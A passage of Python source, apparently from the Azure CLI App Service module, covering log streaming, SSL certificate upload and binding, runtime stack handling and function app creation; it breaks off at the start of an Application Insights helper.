urllib3.contrib.pyopenssl.inject_into_urllib3()
except ImportError:
pass
http = get_pool_manager(url)
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
r = http.request(
'GET',
url,
headers=headers,
preload_content=False
)
if r.status != 200:
raise CLIError("Failed to connect to '{}' with status code '{}' and reason '{}'".format(
url, r.status, r.reason))
if log_file: # download logs
with open(log_file, 'wb') as f:
while True:
data = r.read(1024)
if not data:
break
f.write(data)
else: # streaming
std_encoding = sys.stdout.encoding
for chunk in r.stream():
if chunk:
                # Extra encode() and decode() for stdouts that do not support 'utf-8'
logger.warning(chunk.decode(encoding='utf-8', errors='replace')
.encode(std_encoding, errors='replace')
.decode(std_encoding, errors='replace')
.rstrip('\n\r')) # each line of log has CRLF.
r.release_conn()
def upload_ssl_cert(cmd, resource_group_name, name, certificate_password, certificate_file, slot=None):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
    with open(certificate_file, 'rb') as cert_file:
        cert_contents = cert_file.read()
hosting_environment_profile_param = (webapp.hosting_environment_profile.name
if webapp.hosting_environment_profile else '')
thumb_print = _get_cert(certificate_password, certificate_file)
cert_name = _generate_cert_name(thumb_print, hosting_environment_profile_param,
webapp.location, resource_group_name)
cert = Certificate(password=certificate_password, pfx_blob=cert_contents,
location=webapp.location, server_farm_id=webapp.server_farm_id)
return client.certificates.create_or_update(resource_group_name, cert_name, cert)
def _generate_cert_name(thumb_print, hosting_environment, location, resource_group_name):
return "%s_%s_%s_%s" % (thumb_print, hosting_environment, location, resource_group_name)
def _get_cert(certificate_password, certificate_file):
    ''' Decrypts the .pfx file and returns its SHA1 thumbprint '''
    with open(certificate_file, 'rb') as f:
        p12 = OpenSSL.crypto.load_pkcs12(f.read(), certificate_password)
cert = p12.get_certificate()
digest_algorithm = 'sha1'
thumbprint = cert.digest(digest_algorithm).decode("utf-8").replace(':', '')
return thumbprint
def list_ssl_certs(cmd, resource_group_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.list_by_resource_group(resource_group_name)
def show_ssl_cert(cmd, resource_group_name, certificate_name):
client = web_client_factory(cmd.cli_ctx)
return client.certificates.get(resource_group_name, certificate_name)
def delete_ssl_cert(cmd, resource_group_name, certificate_thumbprint):
client = web_client_factory(cmd.cli_ctx)
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
return client.certificates.delete(resource_group_name, webapp_cert.name)
raise CLIError("Certificate for thumbprint '{}' not found".format(certificate_thumbprint))
def import_ssl_cert(cmd, resource_group_name, name, key_vault, key_vault_certificate_name):
Certificate = cmd.get_models('Certificate')
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise CLIError("'{}' app doesn't exist in resource group {}".format(name, resource_group_name))
server_farm_id = webapp.server_farm_id
location = webapp.location
kv_id = None
if not is_valid_resource_id(key_vault):
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
key_vaults = kv_client.vaults.list_by_subscription()
for kv in key_vaults:
if key_vault == kv.name:
kv_id = kv.id
break
else:
kv_id = key_vault
if kv_id is None:
kv_msg = 'The Key Vault {0} was not found in the subscription in context. ' \
'If your Key Vault is in a different subscription, please specify the full Resource ID: ' \
'\naz .. ssl import -n {1} -g {2} --key-vault-certificate-name {3} ' \
'--key-vault /subscriptions/[sub id]/resourceGroups/[rg]/providers/Microsoft.KeyVault/' \
'vaults/{0}'.format(key_vault, name, resource_group_name, key_vault_certificate_name)
logger.warning(kv_msg)
return
kv_id_parts = parse_resource_id(kv_id)
kv_name = kv_id_parts['name']
kv_resource_group_name = kv_id_parts['resource_group']
kv_subscription = kv_id_parts['subscription']
    # If in the public cloud, check whether the certificate is an App Service certificate, in the same
    # or a different subscription
kv_secret_name = None
cloud_type = cmd.cli_ctx.cloud.name
from azure.cli.core.commands.client_factory import get_subscription_id
subscription_id = get_subscription_id(cmd.cli_ctx)
if cloud_type.lower() == PUBLIC_CLOUD.lower():
if kv_subscription.lower() != subscription_id.lower():
diff_subscription_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_APPSERVICE,
subscription_id=kv_subscription)
ascs = diff_subscription_client.app_service_certificate_orders.list()
else:
ascs = client.app_service_certificate_orders.list()
kv_secret_name = None
for asc in ascs:
if asc.name == key_vault_certificate_name:
kv_secret_name = asc.certificates[key_vault_certificate_name].key_vault_secret_name
    # if kv_secret_name is not populated, it is not an App Service certificate; fall back to Key Vault certificates
if not kv_secret_name:
kv_secret_name = key_vault_certificate_name
cert_name = '{}-{}-{}'.format(resource_group_name, kv_name, key_vault_certificate_name)
lnk = 'https://azure.github.io/AppService/2016/05/24/Deploying-Azure-Web-App-Certificate-through-Key-Vault.html'
lnk_msg = 'Find more details here: {}'.format(lnk)
if not _check_service_principal_permissions(cmd, kv_resource_group_name, kv_name, kv_subscription):
logger.warning('Unable to verify Key Vault permissions.')
logger.warning('You may need to grant Microsoft.Azure.WebSites service principal the Secret:Get permission')
logger.warning(lnk_msg)
kv_cert_def = Certificate(location=location, key_vault_id=kv_id, password='',
key_vault_secret_name=kv_secret_name, server_farm_id=server_farm_id)
return client.certificates.create_or_update(name=cert_name, resource_group_name=resource_group_name,
certificate_envelope=kv_cert_def)
def create_managed_ssl_cert(cmd, resource_group_name, name, hostname, slot=None):
Certificate = cmd.get_models('Certificate')
hostname = hostname.lower()
client = web_client_factory(cmd.cli_ctx)
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
slot_text = "Deployment slot {} in ".format(slot) if slot else ''
raise CLIError("{0}app {1} doesn't exist in resource group {2}".format(slot_text, name, resource_group_name))
parsed_plan_id = parse_resource_id(webapp.server_farm_id)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
if plan_info.sku.tier.upper() == 'FREE' or plan_info.sku.tier.upper() == 'SHARED':
raise CLIError('Managed Certificate is not supported on Free and Shared tier.')
if not _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot):
slot_text = " --slot {}".format(slot) if slot else ""
raise CLIError("Hostname (custom domain) '{0}' is not registered with {1}. "
"Use 'az webapp config hostname add --resource-group {2} "
"--webapp-name {1}{3} --hostname {0}' "
"to register the hostname.".format(hostname, name, resource_group_name, slot_text))
server_farm_id = webapp.server_farm_id
location = webapp.location
easy_cert_def = Certificate(location=location, canonical_name=hostname,
server_farm_id=server_farm_id, password='')
# TODO: Update manual polling to use LongRunningOperation once backend API & new SDK supports polling
try:
return client.certificates.create_or_update(name=hostname, resource_group_name=resource_group_name,
certificate_envelope=easy_cert_def)
except Exception as ex:
poll_url = ex.response.headers['Location'] if 'Location' in ex.response.headers else None
if ex.response.status_code == 202 and poll_url:
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
poll_timeout = time.time() + 60 * 2 # 2 minute timeout
while r.status_code != 200 and time.time() < poll_timeout:
time.sleep(5)
r = send_raw_request(cmd.cli_ctx, method='get', url=poll_url)
if r.status_code == 200:
try:
return r.json()
except ValueError:
return r.text
logger.warning("Managed Certificate creation in progress. Please use the command "
"'az webapp config ssl show -g %s --certificate-name %s' "
" to view your certificate once it is created", resource_group_name, hostname)
return
raise CLIError(ex)
def _check_service_principal_permissions(cmd, resource_group_name, key_vault_name, key_vault_subscription):
from azure.cli.command_modules.role._client_factory import _graph_client_factory
from azure.graphrbac.models import GraphErrorException
from azure.cli.core.commands.client_factory import get_subscription_id
subscription = get_subscription_id(cmd.cli_ctx)
# Cannot check if key vault is in another subscription
if subscription != key_vault_subscription:
return False
kv_client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_KEYVAULT)
vault = kv_client.vaults.get(resource_group_name=resource_group_name, vault_name=key_vault_name)
# Check for Microsoft.Azure.WebSites app registration
AZURE_PUBLIC_WEBSITES_APP_ID = 'abfa0a7c-a6b6-4736-8310-5855508787cd'
AZURE_GOV_WEBSITES_APP_ID = '6a02c803-dafd-4136-b4c3-5a6f318b4714'
graph_sp_client = _graph_client_factory(cmd.cli_ctx).service_principals
for policy in vault.properties.access_policies:
try:
sp = graph_sp_client.get(policy.object_id)
if sp.app_id == AZURE_PUBLIC_WEBSITES_APP_ID or sp.app_id == AZURE_GOV_WEBSITES_APP_ID:
for perm in policy.permissions.secrets:
if perm == "Get":
return True
except GraphErrorException:
pass # Lookup will fail for non service principals (users, groups, etc.)
return False
def _update_host_name_ssl_state(cmd, resource_group_name, webapp_name, webapp,
host_name, ssl_state, thumbprint, slot=None):
Site, HostNameSslState = cmd.get_models('Site', 'HostNameSslState')
updated_webapp = Site(host_name_ssl_states=[HostNameSslState(name=host_name,
ssl_state=ssl_state,
thumbprint=thumbprint,
to_update=True)],
location=webapp.location, tags=webapp.tags)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'begin_create_or_update',
slot, updated_webapp)
def _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, name)
if not webapp:
raise ResourceNotFoundError("'{}' app doesn't exist".format(name))
cert_resource_group_name = parse_resource_id(webapp.server_farm_id)['resource_group']
webapp_certs = client.certificates.list_by_resource_group(cert_resource_group_name)
found_cert = None
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if not found_cert:
webapp_certs = client.certificates.list_by_resource_group(resource_group_name)
for webapp_cert in webapp_certs:
if webapp_cert.thumbprint == certificate_thumbprint:
found_cert = webapp_cert
if found_cert:
if len(found_cert.host_names) == 1 and not found_cert.host_names[0].startswith('*'):
return _update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
found_cert.host_names[0], ssl_type,
certificate_thumbprint, slot)
query_result = list_hostnames(cmd, resource_group_name, name, slot)
hostnames_in_webapp = [x.name.split('/')[-1] for x in query_result]
to_update = _match_host_names_from_cert(found_cert.host_names, hostnames_in_webapp)
for h in to_update:
_update_host_name_ssl_state(cmd, resource_group_name, name, webapp,
h, ssl_type, certificate_thumbprint, slot)
return show_webapp(cmd, resource_group_name, name, slot)
raise ResourceNotFoundError("Certificate for thumbprint '{}' not found.".format(certificate_thumbprint))
def bind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, ssl_type, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name, certificate_thumbprint,
SslState.sni_enabled if ssl_type == 'SNI' else SslState.ip_based_enabled, slot)
def unbind_ssl_cert(cmd, resource_group_name, name, certificate_thumbprint, slot=None):
SslState = cmd.get_models('SslState')
return _update_ssl_binding(cmd, resource_group_name, name,
certificate_thumbprint, SslState.disabled, slot)
def _match_host_names_from_cert(hostnames_from_cert, hostnames_in_webapp):
# the goal is to match '*.foo.com' with host name like 'admin.foo.com', 'logs.foo.com', etc
matched = set()
for hostname in hostnames_from_cert:
if hostname.startswith('*'):
for h in hostnames_in_webapp:
if hostname[hostname.find('.'):] == h[h.find('.'):]:
matched.add(h)
elif hostname in hostnames_in_webapp:
matched.add(hostname)
return matched
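# Illustrative behavior of the matcher above (host names assumed):
#   _match_host_names_from_cert(['*.contoso.com', 'www.fabrikam.com'],
#                               ['admin.contoso.com', 'logs.contoso.com', 'www.fabrikam.com'])
#   -> {'admin.contoso.com', 'logs.contoso.com', 'www.fabrikam.com'}
# '*.foo.com' matches any webapp host sharing the '.foo.com' suffix; exact names match only themselves.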
# helper class that handles runtime stacks in formats like 'node|6.1', 'php|5.5'
class _StackRuntimeHelper:
def __init__(self, cmd, client, linux=False):
self._cmd = cmd
self._client = client
self._linux = linux
self._stacks = []
@staticmethod
def remove_delimiters(runtime):
import re
# delimiters allowed: '|', ':'
if '|' in runtime:
runtime = re.split('[|]', runtime)
elif ':' in runtime:
runtime = re.split('[:]', runtime)
else:
runtime = [runtime]
return '|'.join(filter(None, runtime))
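    # Illustrative behavior (assumed inputs): remove_delimiters('node:12.1') and
    # remove_delimiters('node|12.1') both normalize to 'node|12.1'; a plain
    # 'node' passes through unchanged.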
def resolve(self, display_name):
self._load_stacks_hardcoded()
return next((s for s in self._stacks if s['displayName'].lower() == display_name.lower()),
None)
@property
def stacks(self):
self._load_stacks_hardcoded()
return self._stacks
@staticmethod
def update_site_config(stack, site_config, cmd=None):
for k, v in stack['configs'].items():
setattr(site_config, k, v)
return site_config
@staticmethod
def update_site_appsettings(cmd, stack, site_config):
NameValuePair = cmd.get_models('NameValuePair')
if site_config.app_settings is None:
site_config.app_settings = []
for k, v in stack['configs'].items():
already_in_appsettings = False
for app_setting in site_config.app_settings:
if app_setting.name == k:
already_in_appsettings = True
app_setting.value = v
if not already_in_appsettings:
site_config.app_settings.append(NameValuePair(name=k, value=v))
return site_config
def _load_stacks_hardcoded(self):
if self._stacks:
return
result = []
if self._linux:
result = get_file_json(RUNTIME_STACKS)['linux']
for r in result:
r['setter'] = _StackRuntimeHelper.update_site_config
else: # Windows stacks
result = get_file_json(RUNTIME_STACKS)['windows']
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
    # Currently unused in favor of the hardcoded values above. This function calls the stacks API,
    # which is only updated with Antares deployments; those are infrequent and don't line up with
    # the stacks EOL schedule.
def _load_stacks(self):
if self._stacks:
return
os_type = ('Linux' if self._linux else 'Windows')
raw_stacks = self._client.provider.get_available_stacks(os_type_selected=os_type, raw=True)
bytes_value = raw_stacks._get_next().content # pylint: disable=protected-access
json_value = bytes_value.decode('utf8')
json_stacks = json.loads(json_value)
stacks = json_stacks['value']
result = []
if self._linux:
for properties in [(s['properties']) for s in stacks]:
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
})
else: # Windows stacks
config_mappings = {
'node': 'WEBSITE_NODE_DEFAULT_VERSION',
'python': 'python_version',
'php': 'php_version',
'aspnet': 'net_framework_version'
}
            # get all stack versions except 'java'
for stack in stacks:
if stack['name'] not in config_mappings:
continue
name, properties = stack['name'], stack['properties']
for major in properties['majorVersions']:
default_minor = next((m for m in (major['minorVersions'] or []) if m['isDefault']),
None)
result.append({
'displayName': name + '|' + major['displayVersion'],
'configs': {
config_mappings[name]: (default_minor['runtimeVersion']
if default_minor else major['runtimeVersion'])
}
})
# deal with java, which pairs with java container version
java_stack = next((s for s in stacks if s['name'] == 'java'))
java_container_stack = next((s for s in stacks if s['name'] == 'javaContainers'))
for java_version in java_stack['properties']['majorVersions']:
for fx in java_container_stack['properties']['frameworks']:
for fx_version in fx['majorVersions']:
result.append({
'displayName': 'java|{}|{}|{}'.format(java_version['displayVersion'],
fx['display'],
fx_version['displayVersion']),
'configs': {
'java_version': java_version['runtimeVersion'],
'java_container': fx['name'],
'java_container_version': fx_version['runtimeVersion']
}
})
for r in result:
r['setter'] = (_StackRuntimeHelper.update_site_appsettings if 'node' in
r['displayName'] else _StackRuntimeHelper.update_site_config)
self._stacks = result
def get_app_insights_key(cli_ctx, resource_group, name):
appinsights_client = get_mgmt_service_client(cli_ctx, ApplicationInsightsManagementClient)
appinsights = appinsights_client.components.get(resource_group, name)
if appinsights is None or appinsights.instrumentation_key is None:
raise CLIError("App Insights {} under resource group {} was not found.".format(name, resource_group))
return appinsights.instrumentation_key
def create_functionapp_app_service_plan(cmd, resource_group_name, name, is_linux, sku, number_of_workers=None,
max_burst=None, location=None, tags=None, zone_redundant=False):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
sku = _normalize_sku(sku)
tier = get_sku_tier(sku)
client = web_client_factory(cmd.cli_ctx)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
sku_def = SkuDescription(tier=tier, name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), maximum_elastic_worker_count=max_burst,
hyper_v=None, name=name)
if zone_redundant:
_enable_zone_redundant(plan_def, sku_def, number_of_workers)
return client.app_service_plans.begin_create_or_update(resource_group_name, name, plan_def)
def is_plan_consumption(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier.lower() == 'dynamic'
return False
def is_plan_elastic_premium(cmd, plan_info):
SkuDescription, AppServicePlan = cmd.get_models('SkuDescription', 'AppServicePlan')
if isinstance(plan_info, AppServicePlan):
if isinstance(plan_info.sku, SkuDescription):
return plan_info.sku.tier == 'ElasticPremium'
return False
def create_functionapp(cmd, resource_group_name, name, storage_account, plan=None,
os_type=None, functions_version=None, runtime=None, runtime_version=None,
consumption_plan_location=None, app_insights=None, app_insights_key=None,
disable_app_insights=None, deployment_source_url=None,
deployment_source_branch='master', deployment_local_git=None,
docker_registry_server_password=None, docker_registry_server_user=None,
deployment_container_image_name=None, tags=None, assign_identities=None,
role='Contributor', scope=None, vnet=None, subnet=None):
# pylint: disable=too-many-statements, too-many-branches
if functions_version is None:
logger.warning("No functions version specified so defaulting to 3. In the future, specifying a version will "
"be required. To create a 3.x function you would pass in the flag `--functions-version 3`")
functions_version = '3'
if deployment_source_url and deployment_local_git:
raise CLIError('usage error: --deployment-source-url <url> | --deployment-local-git')
if bool(plan) == bool(consumption_plan_location):
raise CLIError("usage error: --plan NAME_OR_ID | --consumption-plan-location LOCATION")
from azure.mgmt.web.models import Site
SiteConfig, NameValuePair = cmd.get_models('SiteConfig', 'NameValuePair')
docker_registry_server_url = parse_docker_image_name(deployment_container_image_name)
disable_app_insights = (disable_app_insights == "true")
site_config = SiteConfig(app_settings=[])
client = web_client_factory(cmd.cli_ctx)
if vnet or subnet:
if plan:
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
webapp_location = plan_info.location
else:
webapp_location = consumption_plan_location
subnet_info = _get_subnet_info(cmd=cmd,
resource_group_name=resource_group_name,
subnet=subnet,
vnet=vnet)
_validate_vnet_integration_location(cmd=cmd, webapp_location=webapp_location,
subnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
vnet_sub_id=subnet_info["subnet_subscription_id"])
_vnet_delegation_check(cmd, subnet_subscription_id=subnet_info["subnet_subscription_id"],
vnet_resource_group=subnet_info["resource_group_name"],
vnet_name=subnet_info["vnet_name"],
subnet_name=subnet_info["subnet_name"])
site_config.vnet_route_all_enabled = True
subnet_resource_id = subnet_info["subnet_resource_id"]
else:
subnet_resource_id = None
functionapp_def = Site(location=None, site_config=site_config, tags=tags,
virtual_network_subnet_id=subnet_resource_id)
KEYS = FUNCTIONS_STACKS_API_KEYS()
plan_info = None
if runtime is not None:
runtime = runtime.lower()
if consumption_plan_location:
locations = list_consumption_locations(cmd)
location = next((loc for loc in locations if loc['name'].lower() == consumption_plan_location.lower()), None)
if location is None:
raise CLIError("Location is invalid. Use: az functionapp list-consumption-locations")
functionapp_def.location = consumption_plan_location
functionapp_def.kind = 'functionapp'
# if os_type is None, the os type is windows
is_linux = os_type and os_type.lower() == 'linux'
else: # apps with SKU based plan
if is_valid_resource_id(plan):
parse_result = parse_resource_id(plan)
plan_info = client.app_service_plans.get(parse_result['resource_group'], parse_result['name'])
else:
plan_info = client.app_service_plans.get(resource_group_name, plan)
if not plan_info:
raise CLIError("The plan '{}' doesn't exist".format(plan))
location = plan_info.location
is_linux = plan_info.reserved
functionapp_def.server_farm_id = plan
functionapp_def.location = location
if functions_version == '2' and functionapp_def.location in FUNCTIONS_NO_V2_REGIONS:
raise CLIError("2.x functions are not supported in this region. To create a 3.x function, "
"pass in the flag '--functions-version 3'")
if is_linux and not runtime and (consumption_plan_location or not deployment_container_image_name):
raise CLIError(
"usage error: --runtime RUNTIME required for linux functions apps without custom image.")
runtime_stacks_json = _load_runtime_stacks_json_functionapp(is_linux)
if runtime is None and runtime_version is not None:
raise CLIError('Must specify --runtime to use --runtime-version')
# get the matching runtime stack object
runtime_json = _get_matching_runtime_json_functionapp(runtime_stacks_json, runtime if runtime else 'dotnet')
if not runtime_json:
# no matching runtime for os
os_string = "linux" if is_linux else "windows"
supported_runtimes = list(map(lambda x: x[KEYS.NAME], runtime_stacks_json))
raise CLIError("usage error: Currently supported runtimes (--runtime) in {} function apps are: {}."
.format(os_string, ', '.join(supported_runtimes)))
runtime_version_json = _get_matching_runtime_version_json_functionapp(runtime_json,
functions_version,
runtime_version,
is_linux)
if not runtime_version_json:
supported_runtime_versions = list(map(lambda x: x[KEYS.DISPLAY_VERSION],
_get_supported_runtime_versions_functionapp(runtime_json,
functions_version)))
if runtime_version:
if runtime == 'dotnet':
raise CLIError('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined '
'by --functions-version. Dotnet version {} is not supported by Functions version {}.'
.format(runtime_version, functions_version))
raise CLIError('--runtime-version {} is not supported for the selected --runtime {} and '
'--functions-version {}. Supported versions are: {}.'
.format(runtime_version,
runtime,
functions_version,
', '.join(supported_runtime_versions)))
# if runtime_version was not specified, then that runtime is not supported for that functions version
raise CLIError('no supported --runtime-version found for the selected --runtime {} and '
'--functions-version {}'
.format(runtime, functions_version))
if runtime == 'dotnet':
logger.warning('--runtime-version is not supported for --runtime dotnet. Dotnet version is determined by '
'--functions-version. Dotnet version will be %s for this function app.',
runtime_version_json[KEYS.DISPLAY_VERSION])
if runtime_version_json[KEYS.IS_DEPRECATED]:
logger.warning('%s version %s has been deprecated. In the future, this version will be unavailable. '
'Please update your command to use a more recent version. For a list of supported '
'--runtime-versions, run \"az functionapp create -h\"',
runtime_json[KEYS.PROPERTIES][KEYS.DISPLAY], runtime_version_json[KEYS.DISPLAY_VERSION])
site_config_json = runtime_version_json[KEYS.SITE_CONFIG_DICT]
app_settings_json = runtime_version_json[KEYS.APP_SETTINGS_DICT]
con_string = _validate_and_get_connection_string(cmd.cli_ctx, resource_group_name, storage_account)
if is_linux:
functionapp_def.kind = 'functionapp,linux'
functionapp_def.reserved = True
is_consumption = consumption_plan_location is not None
if not is_consumption:
site_config.app_settings.append(NameValuePair(name='MACHINEKEY_DecryptionKey',
value=str(hexlify(urandom(32)).decode()).upper()))
if deployment_container_image_name:
functionapp_def.kind = 'functionapp,linux,container'
site_config.app_settings.append(NameValuePair(name='DOCKER_CUSTOM_IMAGE_NAME',
value=deployment_container_image_name))
site_config.app_settings.append(NameValuePair(name='FUNCTION_APP_EDIT_MODE', value='readOnly'))
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='false'))
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
# clear all runtime specific configs and settings
site_config_json = {KEYS.USE_32_BIT_WORKER_PROC: False}
app_settings_json = {}
# ensure that app insights is created if not disabled
runtime_version_json[KEYS.APPLICATION_INSIGHTS] = True
else:
site_config.app_settings.append(NameValuePair(name='WEBSITES_ENABLE_APP_SERVICE_STORAGE',
value='true'))
else:
functionapp_def.kind = 'functionapp'
# set site configs
for prop, value in site_config_json.items():
snake_case_prop = _convert_camel_to_snake_case(prop)
setattr(site_config, snake_case_prop, value)
# temporary workaround for dotnet-isolated linux consumption apps
if is_linux and consumption_plan_location is not None and runtime == 'dotnet-isolated':
site_config.linux_fx_version = ''
# adding app settings
for app_setting, value in app_settings_json.items():
site_config.app_settings.append(NameValuePair(name=app_setting, value=value))
site_config.app_settings.append(NameValuePair(name='FUNCTIONS_EXTENSION_VERSION',
value=_get_extension_version_functionapp(functions_version)))
site_config.app_settings.append(NameValuePair(name='AzureWebJobsStorage', value=con_string))
# If plan is not consumption or elastic premium, we need to set always on
if consumption_plan_location is None and not is_plan_elastic_premium(cmd, plan_info):
site_config.always_on = True
# If plan is elastic premium or consumption, we need these app settings
if is_plan_elastic_premium(cmd, plan_info) or consumption_plan_location is not None:
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTAZUREFILECONNECTIONSTRING',
value=con_string))
site_config.app_settings.append(NameValuePair(name='WEBSITE_CONTENTSHARE', value=_get_content_share_name(name)))
create_app_insights = False
if app_insights_key is not None:
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=app_insights_key))
elif app_insights is not None:
instrumentation_key = get_app_insights_key(cmd.cli_ctx, resource_group_name, app_insights)
site_config.app_settings.append(NameValuePair(name='APPINSIGHTS_INSTRUMENTATIONKEY',
value=instrumentation_key))
elif disable_app_insights or not runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
# set up dashboard if no app insights
site_config.app_settings.append(NameValuePair(name='AzureWebJobsDashboard', value=con_string))
elif not disable_app_insights and runtime_version_json[KEYS.APPLICATION_INSIGHTS]:
create_app_insights = True
poller = client.web_apps.begin_create_or_update(resource_group_name, name, functionapp_def)
functionapp = LongRunningOperation(cmd.cli_ctx)(poller)
if consumption_plan_location and is_linux:
logger.warning("Your Linux function app '%s', that uses a consumption plan has been successfully "
"created but is not active until content is published using "
"Azure Portal or the Functions Core Tools.", name)
else:
_set_remote_or_local_git(cmd, functionapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
if create_app_insights:
try:
try_create_application_insights(cmd, functionapp)
except Exception: # pylint: disable=broad-except
logger.warning('Error while trying to create and configure an Application Insights for the Function App. '
'Please use the Azure Portal to create and configure the Application Insights, if needed.')
update_app_settings(cmd, functionapp.resource_group, functionapp.name,
['AzureWebJobsDashboard={}'.format(con_string)])
if deployment_container_image_name:
update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
functionapp.identity = identity
return functionapp
def _load_runtime_stacks_json_functionapp(is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
if is_linux:
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['linux'])[KEYS.VALUE]
return get_file_json(FUNCTIONS_STACKS_API_JSON_PATHS['windows'])[KEYS.VALUE]
def _get_matching_runtime_json_functionapp(stacks_json, runtime):
KEYS = FUNCTIONS_STACKS_API_KEYS()
matching_runtime_json = list(filter(lambda x: x[KEYS.NAME] == runtime, stacks_json))
if matching_runtime_json:
return matching_runtime_json[0]
return None
def _get_supported_runtime_versions_functionapp(runtime_json, functions_version):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
supported_versions_list = []
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]:
supported_versions_list.append(runtime_version_json)
return supported_versions_list
def _get_matching_runtime_version_json_functionapp(runtime_json, functions_version, runtime_version, is_linux):
KEYS = FUNCTIONS_STACKS_API_KEYS()
extension_version = _get_extension_version_functionapp(functions_version)
if runtime_version:
for runtime_version_json in runtime_json[KEYS.PROPERTIES][KEYS.MAJOR_VERSIONS]:
if (runtime_version_json[KEYS.DISPLAY_VERSION] == runtime_version and
extension_version in runtime_version_json[KEYS.SUPPORTED_EXTENSION_VERSIONS]):
return runtime_version_json
return None
# find the matching default runtime version
supported_versions_list = _get_supported_runtime_versions_functionapp(runtime_json, functions_version)
default_version_json = {}
default_version = 0.0
for current_runtime_version_json in supported_versions_list:
if current_runtime_version_json[KEYS.IS_DEFAULT]:
current_version = _get_runtime_version_functionapp(current_runtime_version_json[KEYS.RUNTIME_VERSION],
is_linux)
if not default_version_json or default_version < current_version:
default_version_json = current_runtime_version_json
default_version = current_version
return default_version_json
def _get_extension_version_functionapp(functions_version):
if functions_version is not None:
return '~{}'.format(functions_version)
return '~2'
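# Illustrative mapping: _get_extension_version_functionapp('3') -> '~3';
# _get_extension_version_functionapp(None) -> '~2' (the pre-3.x default).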
def _get_app_setting_set_functionapp(site_config, app_setting):
return list(filter(lambda x: x.name == app_setting, site_config.app_settings))
def _convert_camel_to_snake_case(text):
return reduce(lambda x, y: x + ('_' if y.isupper() else '') + y, text).lower()
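# Illustrative conversions (inputs assumed):
#   _convert_camel_to_snake_case('linuxFxVersion')        -> 'linux_fx_version'
#   _convert_camel_to_snake_case('use32BitWorkerProcess') -> 'use32_bit_worker_process'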
def _get_runtime_version_functionapp(version_string, is_linux):
import re
windows_match = re.fullmatch(FUNCTIONS_WINDOWS_RUNTIME_VERSION_REGEX, version_string)
if windows_match:
return float(windows_match.group(1))
linux_match = re.fullmatch(FUNCTIONS_LINUX_RUNTIME_VERSION_REGEX, version_string)
if linux_match:
return float(linux_match.group(1))
try:
return float(version_string)
except ValueError:
return 0
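# Illustrative behavior (assumed inputs): when neither OS-specific regex matches, plain numeric
# strings fall through to float(), so '3.1' -> 3.1, while a non-numeric value such as 'latest'
# returns 0 and therefore never wins the default-version comparison above.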
def _get_content_share_name(app_name):
    # content share names must be at most 63 characters long, use lowercase letters and digits, and be
    # unique, so take the first 50 characters of the app name and append the last 12 hex characters of
    # a random uuid4
share_name = app_name[0:50]
suffix = str(uuid.uuid4()).split('-')[-1]
return share_name.lower() + suffix
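# For illustration (app name assumed): 'MyVeryLongFunctionAppName' yields a share name such as
# 'myverylongfunctionappname9f86d081884c' -- the lowercased app name (first 50 characters) plus
# the final 12-hex-character group of a uuid4, keeping the result within the 63-character limit.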
def try_create_application_insights(cmd, functionapp):
